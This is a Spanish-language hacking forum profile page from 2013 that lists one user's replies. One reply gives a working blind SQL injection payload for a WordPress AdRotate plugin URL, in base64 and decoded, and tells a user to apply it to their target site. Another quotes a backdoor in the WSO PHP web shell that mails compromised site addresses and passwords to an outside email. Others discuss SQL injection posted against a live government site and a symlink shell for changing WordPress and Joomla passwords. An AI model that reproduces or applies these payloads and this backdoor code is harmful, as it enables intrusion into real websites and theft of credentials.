saludos compa;
me has dejao
sigue asi compa vas bien
me has dejao sigue asi compa vas bien
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Underc0de / Re:Reto Oficial #2 - El rey de la Colina - Anotate!
Septiembre 21, 2013, 11:07:42 PM
saludos,
aer me apunto si se puede aun
aer me apunto si se puede aun
#3
Bugs y Exploits / Re:[JoomlaScan v1.4] Scanner de vulnerabilidades para Joomla
Septiembre 11, 2013, 04:51:24 AM #4
Cursos, manuales y libros / Re:Pedido de Libros - Manuales [Pedilo aca!]
Septiembre 04, 2013, 03:57:22 AM
estoy en la busqueda de este libro:
Desarrollo Web con PHP 6, Apache y MySQL
Timothy Boronczyk, Elizabeth Naramore, Jason Gerner, Yann Le Scouarnec, Jeremy Stolz y Michael K. Glass
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Desarrollo Web con PHP 6, Apache y MySQL
Timothy Boronczyk, Elizabeth Naramore, Jason Gerner, Yann Le Scouarnec, Jeremy Stolz y Michael K. Glass
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#5
Dudas y pedidos generales / Re:Wordpress vulnerable sql
Agosto 27, 2013, 03:18:23 AM
saludos compa;
haz lo siguiente:
Código: text
http://www.AQUITUWEB.com/wp-content/plugins/adrotate/adrotate-out.php?track= <-- AQUI ESTO:Código: text
ESTO:Código: text
ES ESTO:Código: text
lo cual esta encodeado en based64
si no entendistes como funciona..... vas a tener que leeerrr y mucho..... o mejor te dedicas a otras cosas...
saludos;
haz lo siguiente:
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkjhttp://www.AQUITUWEB.com/wp-content/plugins/adrotate/adrotate-out.php?track= <-- AQUI ESTO:
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkjESTO:
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkjES ESTO:
1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
lo cual esta encodeado en based64
si no entendistes como funciona..... vas a tener que leeerrr y mucho..... o mejor te dedicas a otras cosas...
saludos;
#6
Front-end / Re:El gran libro de HTML5, CSS3 y Javascript [MF]
Agosto 21, 2013, 01:32:58 AM
Leyendo aer como esta...
#7
Bugs y Exploits / Re:Symlink en parte automatizado
Agosto 09, 2013, 11:21:01 PM
#8
Shells / Re:[PHP] WSO shell backdoor
Julio 26, 2013, 11:37:31 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hay que enseñarles a ofuscar código a estos juakerzCódigo: text
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "WSO 2.7 http://$target by $visitor";
$body = "Bug: $target by $visitor - $auth_pass";
if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
este es un descarado...... ----> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login@gmail.com
#9
Bugs y Exploits / Re:Full Source Disclosure por SQLI
Julio 26, 2013, 10:29:42 PM
el clasico LOAD_FILE()
aer cuando no puedes ver o provocar el error y ver el path o Document Root...!!!!
tambien tenes que aprovechar de explicar INTO OUTFILE para culminar el tuto...
pero ta bueno
aer cuando no puedes ver o provocar el error y ver el path o Document Root...!!!!
tambien tenes que aprovechar de explicar INTO OUTFILE para culminar el tuto...
pero ta bueno
#10
Wargames y retos / Re:[PROXIMAMENTE] Reto de esteganografia con premio en $$ [REGISTRESE AQUI]
Julio 24, 2013, 09:04:55 PM
Ok soy novato en este asunto pero puedo participar, me apunto....
#11
Hacking ShowOff / Re:SQLI http://webhosting.redsalud.gov.cl/
Junio 28, 2013, 11:23:58 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.
Ademas le doy un poco mas de vida a la sección!
Saludos compa;
estoy totalmente de acuerdo con lo que dices; el compartir conocimientos e intercambiar ideas...!!!, haciendo asi que otro se interesen en el tema como los que se estaban realizando en los wargames donde se colocaban Retos con el fin meramente educativo... de escenarios reales...
para dejar volar la imaginacion y los conocimientos en cuanto a los diversos retos.., lo que si no comparto es la publicacion del vector... asi se pierde la magia, el encanto, no dejas que la curiosidad de como obtener el vector, y solo facilitas lameradas como me dijeron alguna vez con respecto a una web gubernamental...
#12
Dudas y pedidos generales / Re:Duda con tipo de hash
Junio 23, 2013, 04:12:28 PMd688e36a56abaacd19c9f0fd2ac32be88def71f2956ed0a2770b2f3830237588a4dad03af5f140c55fcbbba86e6fe727fda37103523385a6b9936cf7f974df8d
a mi tambien me da:
SHA512
#13
Bugs y Exploits / Re:Destripando la logica de una inyeccion [Mysql Doble Query Error Based]
Junio 15, 2013, 01:07:18 AM muy bueno....!!!
#14
Wargames y retos / Re:[Medium/Hard]MySQL Injection Challenge.
Junio 14, 2013, 04:35:52 AM
Esta dura la cosa, ahy que leer y buscar comodines...
Nota: gradecimientos al compa por su orientacion...
#15
Seguridad Wireless / Re:Asegurando nuestra red wireless
Junio 04, 2013, 11:56:17 PM
es muy bueno compa;
#16
Base de Datos / Re: Tutorial básico de bases de datos
Junio 04, 2013, 11:20:39 PMCita de: [Corruptedyte link=topic=17301.msg59408#msg59408 date=1370390281]
En mis tiempos (cuando entraba a este foro) la gente tenia mas nivel y no publicaban cosas tan tan basicas, otra cosa en mis tiempos tambien a Mysql, PostgreSQL, etc... no se le llamaban bases de datos, se les llamaban SGBD...
jajajajaja ya empezo la elite a criticar....!!! los aportes de los demas...
o sera que nunca lo habian hecho tambien y se recuerdan de aquellos tiempos de n00bs cuan do publicaban republicaciones retraducidas del ingles al español para darselas de elite....
saludos;
nota: sin animo de ofender, el qque le pique que se rasque...!!!
#17
Seguridad web y en servidores / Re:[ACLARACION] Tipos de servidores
Mayo 28, 2013, 01:14:02 AM me voy enterando
#19
Bugs y Exploits / Re:Joomla! 3.0.3 Object Injection Vulnerability
Mayo 05, 2013, 01:49:19 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Alguna pequeña explicacion de su uso?, funciona con todas las paginas que usan joomla o deben tener un plugin especifico para que la vulnerabilidad funcione?
si por favor....
#20
Dudas y pedidos generales / Re:problema con symlink
Marzo 08, 2013, 01:03:20 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola man, mira para symlinik hay varias herramientas que te podrian simplificar el trabajo y que no sea tan aburrido xD
Aca te dejo 1 shell para hacer symlink:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Es tan simple como darle a Domain&Script y despues usar el wordpress password changer y el joomla password changer
Espero haberte ayudado...
SombrA
woowww
eres un capo wey....
